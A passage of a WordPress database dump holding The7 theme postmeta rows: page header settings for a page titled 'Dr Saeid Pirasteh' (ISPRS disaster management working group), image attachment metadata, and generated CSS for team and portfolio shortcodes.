(22443,3433,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22444,3434,'_edit_last','1'),
(22445,3434,'_dt_sidebar_position','disabled'),
(22446,3434,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22447,3434,'_dt_sidebar_hide_on_mobile','0'),
(22448,3434,'_dt_footer_show','1'),
(22449,3434,'_dt_footer_widgetarea_id','sidebar_2'),
(22450,3434,'_dt_footer_hide_on_mobile','0'),
(22451,3434,'_dt_header_title','fancy'),
(22452,3434,'_dt_header_background','normal'),
(22453,3434,'_dt_header_background_below_slideshow','disabled'),
(22454,3434,'_dt_header_transparent_bg_color_scheme','light'),
(22455,3434,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22456,3434,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22457,3434,'_dt_header_transparent_bg_color','#000000'),
(22458,3434,'_dt_header_transparent_bg_opacity','50'),
(22459,3434,'_dt_header_disabled_background','normal'),
(22460,3434,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22461,3434,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22462,3434,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22463,3434,'_dt_header_disabled_transparent_bg_color','#000000'),
(22464,3434,'_dt_header_disabled_transparent_bg_opacity','50'),
(22465,3434,'_dt_page_overrides_top_margin',''),
(22466,3434,'_dt_page_overrides_right_margin',''),
(22467,3434,'_dt_page_overrides_bottom_margin',''),
(22468,3434,'_dt_page_overrides_left_margin',''),
(22469,3434,'_dt_mobile_page_padding_top',''),
(22470,3434,'_dt_mobile_page_padding_right',''),
(22471,3434,'_dt_mobile_page_padding_bottom',''),
(22472,3434,'_dt_mobile_page_padding_left',''),
(22473,3434,'_dt_fancy_header_layout_heading',''),
(22474,3434,'_dt_fancy_header_title_aligment','center'),
(22475,3434,'_dt_fancy_header_height','300'),
(22476,3434,'_dt_fancy_header_padding-top','0px'),
(22477,3434,'_dt_fancy_header_padding-bottom','0px'),
(22478,3434,'_dt_fancy_header_breadcrumbs_heading',''),
(22479,3434,'_dt_fancy_header_breadcrumbs','disabled'),
(22480,3434,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22481,3434,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22482,3434,'_dt_fancy_header_title_heading',''),
(22483,3434,'_dt_fancy_header_title_mode','custom'),
(22484,3434,'_dt_fancy_header_title','Dr Saeid Pirasteh'),
(22485,3434,'_dt_fancy_header_title_font_size','30'),
(22486,3434,'_dt_fancy_header_title_line_height','36'),
(22487,3434,'_dt_fancy_header_text_transform','none'),
(22488,3434,'_dt_fancy_header_title_color_mode','color'),
(22489,3434,'_dt_fancy_header_title_color','#ffffff'),
(22490,3434,'_dt_fancy_header_subtitle_heading',''),
(22491,3434,'_dt_fancy_header_subtitle','ISPRS ICWG III/IVa on   Disaster Management'),
(22492,3434,'_dt_fancy_header_subtitle_font_size','18'),
(22493,3434,'_dt_fancy_header_subtitle_line_height','26'),
(22494,3434,'_dt_fancy_header_subtitle_text_transform','none'),
(22495,3434,'_dt_fancy_header_subtitle_color_mode','color'),
(22496,3434,'_dt_fancy_header_subtitle_color','#ffffff'),
(22497,3434,'_dt_fancy_header_bg_heading',''),
(22498,3434,'_dt_fancy_header_bg_color','#222222'),
(22499,3434,'_dt_fancy_header_bg_image_origin','custom'),
(22500,3434,'_dt_fancy_header_bg_image','a:0:{}'),
(22501,3434,'_dt_fancy_header_bg_repeat','no-repeat'),
(22502,3434,'_dt_fancy_header_bg_position_x','center'),
(22503,3434,'_dt_fancy_header_bg_position_y','center'),
(22504,3434,'_dt_fancy_header_bg_fullscreen','1'),
(22505,3434,'_dt_fancy_header_bg_overlay','0'),
(22506,3434,'_dt_fancy_header_overlay_color','#000'),
(22507,3434,'_dt_fancy_header_bg_overlay_opacity','50'),
(22508,3434,'_dt_fancy_header_scroll_effect','default'),
(22509,3434,'_dt_fancy_header_bg_parallax','0.5'),
(22510,3434,'_dt_fancy_header_responsiveness_heading',''),
(22511,3434,'_dt_fancy_header_responsiveness','disabled'),
(22512,3434,'_dt_fancy_header_responsiveness_switch','778px'),
(22513,3434,'_dt_fancy_header_responsive_height','70'),
(22514,3434,'_dt_fancy_header_responsive_font_size','30'),
(22515,3434,'_dt_fancy_header_responsive_title_line_height','38'),
(22516,3434,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22517,3434,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22518,3434,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22519,3434,'_dt_teammate_options_go_to_single','1'),
(22520,3434,'_dt_teammate_options_position',''),
(22521,3434,'_dt_teammate_options_website',''),
(22522,3434,'_dt_teammate_options_mail',''),
(22523,3434,'_dt_teammate_options_facebook',''),
(22524,3434,'_dt_teammate_options_twitter',''),
(22525,3434,'_dt_teammate_options_dribbble',''),
(22526,3434,'_dt_teammate_options_you-tube',''),
(22527,3434,'_dt_teammate_options_rss',''),
(22528,3434,'_dt_teammate_options_delicious',''),
(22529,3434,'_dt_teammate_options_flickr',''),
(22530,3434,'_dt_teammate_options_lastfm',''),
(22531,3434,'_dt_teammate_options_linkedin',''),
(22532,3434,'_dt_teammate_options_vimeo',''),
(22533,3434,'_dt_teammate_options_tumbler',''),
(22534,3434,'_dt_teammate_options_pinterest',''),
(22535,3434,'_dt_teammate_options_devian',''),
(22536,3434,'_dt_teammate_options_skype',''),
(22537,3434,'_dt_teammate_options_github',''),
(22538,3434,'_dt_teammate_options_instagram',''),
(22539,3434,'_dt_teammate_options_stumbleupon',''),
(22540,3434,'_dt_teammate_options_behance',''),
(22541,3434,'_dt_teammate_options_px-500',''),
(22542,3434,'_dt_teammate_options_tripedvisor',''),
(22543,3434,'_dt_teammate_options_vk',''),
(22544,3434,'_dt_teammate_options_foursquare',''),
(22545,3434,'_dt_teammate_options_xing',''),
(22546,3434,'_dt_teammate_options_weibo',''),
(22547,3434,'_dt_teammate_options_odnoklassniki',''),
(22548,3434,'_dt_teammate_options_research-gate',''),
(22549,3434,'_dt_teammate_options_yelp',''),
(22550,3434,'_dt_teammate_options_blogger',''),
(22551,3434,'_dt_teammate_options_soundcloud',''),
(22552,3434,'_dt_teammate_options_viber',''),
(22553,3434,'_dt_teammate_options_whatsapp',''),
(22554,3434,'_dt_teammate_options_reddit',''),
(22555,3434,'_dt_teammate_options_snapchat',''),
(22556,3434,'_dt_teammate_options_telegram',''),
(22557,3434,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22558,3435,'_wp_attached_file','2022/12/w243.jpg'),
(22559,3435,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:179;s:6:\"height\";i:192;s:4:\"file\";s:16:\"2022/12/w243.jpg\";s:8:\"filesize\";i:33873;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w243-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3606;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22560,3434,'_thumbnail_id','3435'),
(22561,3436,'_wp_attached_file','2022/12/w242.jpg'),
(22562,3436,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:179;s:6:\"height\";i:192;s:4:\"file\";s:16:\"2022/12/w242.jpg\";s:8:\"filesize\";i:8395;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w242-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1088;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22563,3433,'_thumbnail_id','3551'),
(22564,3427,'the7_shortcodes_dynamic_css','a:2:{s:32:\"cc09b4287b38eeacdd9cab40284e377e\";s:6833:\".dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .team-desc {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-cc09b4287b38eeacdd9cab40284e377e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  